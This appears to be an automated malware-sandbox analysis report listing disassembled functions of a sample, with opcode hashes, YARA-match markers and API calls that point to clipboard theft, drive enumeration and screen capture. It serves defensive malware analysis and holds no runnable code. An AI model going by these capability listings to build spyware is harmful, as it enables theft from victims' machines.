Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 917414fce93f3a61645b2267817af1f51ed3876599dd6aafba8c5d90dcb27b46
Instruction ID: 33b79ecd8c778f2d23673da27d078db37d40aefcf863c02297f17c4168700496
Opcode Fuzzy Hash: 917414fce93f3a61645b2267817af1f51ed3876599dd6aafba8c5d90dcb27b46
Instruction Fuzzy Hash: FF21F3382581B20BDB188F3998F05B6F792EB8731271A027FEBC2C7392D2159D55C7A4

Function 0066BA6C Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7049adb2f7025235c58f023c4660da274fa3317cab2b6e39ac701c24428ad074
Instruction ID: 8de91782f86a5d4c8ac62199b01f2f92afb8d431db1f76a5cb72811c7bb2cde4
Opcode Fuzzy Hash: 7049adb2f7025235c58f023c4660da274fa3317cab2b6e39ac701c24428ad074
Instruction Fuzzy Hash: 6221B871641B408FE722CF22C8917A7BBF2EB95314F05996DC1C297A59CBB8A40A8B44

Function 00438520 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: 11cf033bb50aef6adb2bbe7b02e6cb6781f41557c363ff6b9b8f28e1f234bab9
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: 8B11A933A052D40EC3168D3C8840565FFE30AD7635F69939EF4B49B2D2DA2ACD8A8359

Function 00698787 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: f2c9b516d00f94d40f6a5193aa78cff2d4ca243b22704669324a6e6081fa677e
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: B911E933A051D00DC7168D7C88005A9BFA70A93774F6983D9F4B59B6D2CA238D8B8360

Function 0042BB00 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c486ac2ce1ad100f0e38d66cbdf0be4d35fa78da5d65ee2e406166fba6341134
Instruction ID: 60ee57cc75265846ada0afa1f54ef24058dfca82aab4f0d1b8d5b1c2d5a04392
Opcode Fuzzy Hash: c486ac2ce1ad100f0e38d66cbdf0be4d35fa78da5d65ee2e406166fba6341134
Instruction Fuzzy Hash: 46019EB1B00B1157DB209E11A8D0B27B7A8AF85708F58443EE8445B746DB79FC05C2D9

Function 0068BD67 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 704165ecad2831eee6818578ecb7b66d087a772bcbae644b5281e1cc38099ed0
Instruction ID: c702a76268b217e8b5e06e3505cd61a75c43a2ec3d3e6307885fcdf9de0daa28
Opcode Fuzzy Hash: 704165ecad2831eee6818578ecb7b66d087a772bcbae644b5281e1cc38099ed0
Instruction Fuzzy Hash: A001D4F16007016BE720BE6095C1B7BB6BB6F81710F18562CE9055B301DFB2EC05C795

Function 006C9D23 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934907231.00000000006C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 006C9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: dbe8fc31629e485c83d563380c02f364f689dd5bdabf9c1319b91b96935c715d
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 0F118E72340500AFD744DF59DC85FA673EAEF89320B2980A9ED09DB356D676EC42C760

Function 0041B184 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
Instruction ID: c9cc8284e85fe6abf120993d5689944f48ac7ce1a7ddbbf0d82d0496898c4a81
Opcode Fuzzy Hash: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
Instruction Fuzzy Hash: 6911D331104B508FD7248F25C8243A7BBE1AB56318F198A5DC1E7877D1DB7AE1098B44

Function 0067B3EB Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
Instruction ID: 1b07ed4db257a23dd3330744a5531970539623b89f832ba3ce34288477801d62
Opcode Fuzzy Hash: 5902da4a83a0c680140072e5af1454c543d54360fc1713abbe1431a6a1abbba6
Instruction Fuzzy Hash: 7E11D331104B508FD7248F25C8243B7BBE2AB66318F199A5DC1E787BD5DB7AE10A8B44

Function 0041B173 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
Instruction ID: f399462e58419c9d3019aec57572db2d86c2935946d127ab36988b8cbde57321
Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
Instruction Fuzzy Hash: 6A0171745082828FD7128F2994206A6FBE0EF63314F1896C7D4D58BA83C368A985C7A9

Function 0067B3DA Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
Instruction ID: f12c00bd201268feb06b6adc480cf145625d848775ec35daee91795d5c23c4c5
Opcode Fuzzy Hash: 153546a5fbbb63670836219b0711ac520bb9ba94bdbc265540c00f4ebd0ea963
Instruction Fuzzy Hash: 450171201082C28FD7228F28D410BA6FBF0AF53314F18D6CAD4D98B683D3649945C765

Function 0041B882 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction ID: 925483313e90eaab4478f3efb897dfea373d722ea9097d537696ebe3f586dc89
Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction Fuzzy Hash: B90184305082C28ED7128F2984207A6FFA0EF63314F1895C7D4D58F6C3C3689985C7A9

Function 0041BB21 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
Instruction ID: ce15afb6e8349f4df79a6844a38630f2605c57d7838470a331403b3b5471d388
Opcode Fuzzy Hash: c35b802276cb4cab2e01238cfef8ad4f73f74ed2e8d92cb0ff5c3d327f1c90cc
Instruction Fuzzy Hash: 6D01F2745082828EEB128F29D0107A7FBE0EF63314F18969AC4D58F6C3C379D885C7A9

Function 0040C3EC Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
Instruction ID: c0b4a7645aed046faff80445a1a00849260a9e0a604dc3165cb580035c2becad
Opcode Fuzzy Hash: cd38a00dc9aa6d99ca01aac821546609123fc2e2b8e046733f98ea8146a72aec
Instruction Fuzzy Hash: C5110C7025C3808FD7148F54D9D576BBBE1ABD2304F244A2CD5C127292D7F5890987A7

Function 0067BAE9 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction ID: 3800ee5a71941d2ee4e33d7c751bfab1376b0dfc46c2fbd1f4891ad0e00abdd5
Opcode Fuzzy Hash: b6779701cec66d85e342211494ba6ca2ab48124764d9d56f55accc6aa658e0e4
Instruction Fuzzy Hash: 2701A2201082C28FEB224F288410BA6FFF0EF63314F18E6CAD0D98F683D3689945C765

Function 0067BD88 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
Instruction ID: 732f7f24f559445ca1a6872b79a5c48d2b5d6dfd65cd580ee9f1e16141681a96
Opcode Fuzzy Hash: fad5250513806df5dd8045c20fe98b1af86ce319376dba478ac7ddfced606c7b
Instruction Fuzzy Hash: 6C01F2605042C28FEB218F28D010BA6FBE0AF63324F18D6DAC4D98B383D375C845C765

Function 0041AEFF Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction ID: 743bb6218d146487c45d38f060deef663a31a3ebd16d578a5b80eb567479d545
Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction Fuzzy Hash: FA01A2205082C28EE7128F2984207B6FFA0EF63314F1896C7D4D58F6C3C3699985C7A9

Function 0067B166 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction ID: a515cf24f8c88a5c65a5e39fa61688d44c08cd3916f8613878703f5bcca5b400
Opcode Fuzzy Hash: 6d4357f5d039b7e7fc8698bf40539a149331d6485b26d5a26d22b351b8adaedb
Instruction Fuzzy Hash: 220162205082C28FEB224B299410BB6FFE0AF53314F18E6D6D5D98F683D3698945C765

Function 0040C334 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction ID: 19ad3dfdcd8e9eec61f1e1188f3eb7c49d356ea6c47e6a039e33f49038878d3c
Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction Fuzzy Hash: 0D11087465C3808BD318CF18D9C075BBBE29BD6314F244A2CD5C117295C7B5990ACB6A

Function 0066C59B Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction ID: 39e65ab6eac446e2584e44565f42abdc78548921947d49b2566b10138a95f9fd
Opcode Fuzzy Hash: bc8b52f0ebde1275c747968acf05f407d654f666dd441839f953e78bda0e1710
Instruction Fuzzy Hash: 2511087465C3804FD318CF18DD8076ABBE29BD6214F244A1CD5C217355C7B1990ACB66

Function 0067773F Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
Instruction ID: 16d5fc5650bd4ca73dacb1555d5ff82c70b20d0ac96e0f0cd6f6a9ed4ff584d5
Opcode Fuzzy Hash: 0fc9c2b9ab787b67918dace5e316ea39913c3e7de64737a5f9c964aa54dc5f10
Instruction Fuzzy Hash: E801D66550D3C14BD72A8F3494543EABBE19F97314F0988BEC0C55B193EA3D854AC729

Function 00660D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: a60c24d993cbccf98a249165d32e4b252ecb079773f30f13a6df0b1f2fa8fb70
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1A018F76A006148FEB21CF64C804BEB33AAEF86316F4545B5D90A97281E774A9418B90

Function 0040CEC7 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: 7afc85315bce952cb7d9511845f2cfe5cc4fdaba4f93361a027a170bce18a72b
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: B2E07D3461DA008BE218EF12D95543B73B2AF82308711587E91D3276D2CE78A806DB5D

Function 0066D12E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction ID: 4409f0d9e5353fd4dd3797aedc92d8af9f6bf24c14a42718ad4c70b8277bc9ae
Opcode Fuzzy Hash: 41d706f10eab7f6aa9807f481bba08dd8ed5b6f7244fe64e6bd3362bb5ad2f88
Instruction Fuzzy Hash: F8E07D346186C08FC358EB35EC718397373AFD1308710552D905707E52CE75A846CB0E

Function 0041F2A0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 3e00189c545ef2cffbc0a4c45a62ec63a19577d5de140b8962752aa3758dc2ad
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: EDD0A7755487A10E9759CD3804A04B7FBE8E947612B1814EFE4D5E7205D239DC46469C

Function 0067F507 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 11cc1a9a77c37838da24fc7db5e63a51443e6d210933ae2609b49479d813ee06
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: ECD097605083A00E6708CE3890A0CBBFBE4E943212B0850AEE0C5E3204D220EC018258

Function 0040D334 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934642541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1934642541.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DPlvBkg4aj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 8c6602917fdb956e33e5ed0c062c44bb8739f147fa9184780212f41d8b26cb24
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: 50C04C69E6C4008B924CCB15AC5153266769B8B254715E03A841663255E234945B950D

Function 0066D59B Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction ID: 3d0fee3d3e83686dc39f0ec8e3158bfba5739d2e456002f314c86969f922bc29
Opcode Fuzzy Hash: c0d29d2c066fb543f05896e7434625b03865aceeb40a931a3d9b644db311bfe7
Instruction Fuzzy Hash: 98C04C69F6C4008A9248CB15EC5053162779BCB254B15E029801A93256E2249457890D

Function 006A21EA Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction ID: d46756a0e1fb04911aea311e00f3b6d6bbb29cfd6f8012ad29779e734c60ec08
Opcode Fuzzy Hash: 35d2e33cd3e1e12ea04a62caa481261f2aa62d3dab37d938482d2be42403fd6b
Instruction Fuzzy Hash: D7B002749493418BD380CF18D545726F6F0B747615F142919A054F3151D374D9488A5E

Function 006A1C3E Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction ID: c018d795f0dc3322a67de82126959776e6cc80093cc23c5047751edba26d1c35
Opcode Fuzzy Hash: 3b31a4ec24c9909080489b0d4d2d3b4d03d345a3c8726ed2263eab24f62679d5
Instruction Fuzzy Hash: BC900224D49100CA81408F45A480570E278630B10DF1534109008F3011C210D404450C

Function 00696A57 Relevance: 29.9, APIs: 6, Strings: 11, Instructions: 109clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00696A6B
GetClipboardData.USER32 ref: 00696A86
GlobalLock.KERNEL32 ref: 00696A9F
GetWindowLongW.USER32 ref: 00696B04
GlobalUnlock.KERNEL32 ref: 00696BC0
CloseClipboard.USER32 ref: 00696BC9

Strings

C, xrefs: 00696B1F
N, xrefs: 00696B29
t, xrefs: 00696B3D
}, xrefs: 00696B38
O, xrefs: 00696B33
F, xrefs: 00696B47
@, xrefs: 00696B51
B, xrefs: 00696B2E
{, xrefs: 00696B24
K, xrefs: 00696B4C
E, xrefs: 00696B1A

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: @$B$C$E$F$K$N$O$t${$}
API String ID: 2832541153-984153585
Opcode ID: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction ID: b9b8aab5fd16a7a19bedece2aea58da5a35f69e236925516eee7f6bf11101836
Opcode Fuzzy Hash: 8fd00541a03fdab39137d35ec259fb7aeeef9dd7c60101cc427a738eb574f5a5
Instruction Fuzzy Hash: 11417B7040C3818EE700EF78D48935FBFE5AB92318F05096DE4C987392D6B9C5898BA7

Function 006855CF Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 106COMMON

Download Yara Rule

APIs

GetLogicalDrives.KERNEL32 ref: 0068572D

Strings

%\)R, xrefs: 00685612
C`<f, xrefs: 0068563A
,X*^, xrefs: 0068560A
1D6Z, xrefs: 00685602
.T'j, xrefs: 00685622
:@&F, xrefs: 006855FA
?P:V, xrefs: 0068561A

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: DrivesLogical
String ID: %\)R$,X*^$.T'j$1D6Z$:@&F$?P:V$C`<f
API String ID: 999431828-351939610
Opcode ID: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction ID: d84ff798ad2ce1f0fcc68dc0e8e99ca462cc74ba0496ea4e6344bcb8fb6ba911
Opcode Fuzzy Hash: 4f62df2b81f42cfb46ec157f180c00cd4febe93a651d1f2f065370f133753792
Instruction Fuzzy Hash: 5931EBB45093448FC710EF29C96126BBBF2FFC2724F04991CE5864B720EB799946CB46

Function 00696BE7 Relevance: 12.1, APIs: 8, Instructions: 67windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00696BF0
GetCurrentObject.GDI32(00000000,00000007), ref: 00696C11
GetObjectW.GDI32(00000000,00000018,?), ref: 00696C21
DeleteObject.GDI32(00000000), ref: 00696C28
CreateCompatibleDC.GDI32(00000000), ref: 00696C37
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00696C42
SelectObject.GDI32(00000000,00000000), ref: 00696C4E
BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,00CC0020), ref: 00696C71

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: Object$CompatibleCreate$BitmapCurrentDeleteSelect
String ID:
API String ID: 2843486406-0
Opcode ID: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction ID: 5d93bb05501ee1774663acda8bebba7781e3009dc36ab29d57fe08c198d2d0dd
Opcode Fuzzy Hash: 637d2dcd770b1b81d6daddeec98349090a5cabd35a80d80db673790c1e385553
Instruction Fuzzy Hash: 37214FB9504310EFE3509F609C49B2B7BF8EB8AB11F01492DFA59E2290D77498048B67

Function 00685367 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00685411

Strings

XY, xrefs: 006853AD
+$e, xrefs: 00685459
+$e, xrefs: 006853CC, 006853E1
E#G, xrefs: 006853A1

Memory Dump Source

Source File: 00000000.00000002.1934820256.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_DPlvBkg4aj.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: +$e$+$e$XY$E#G
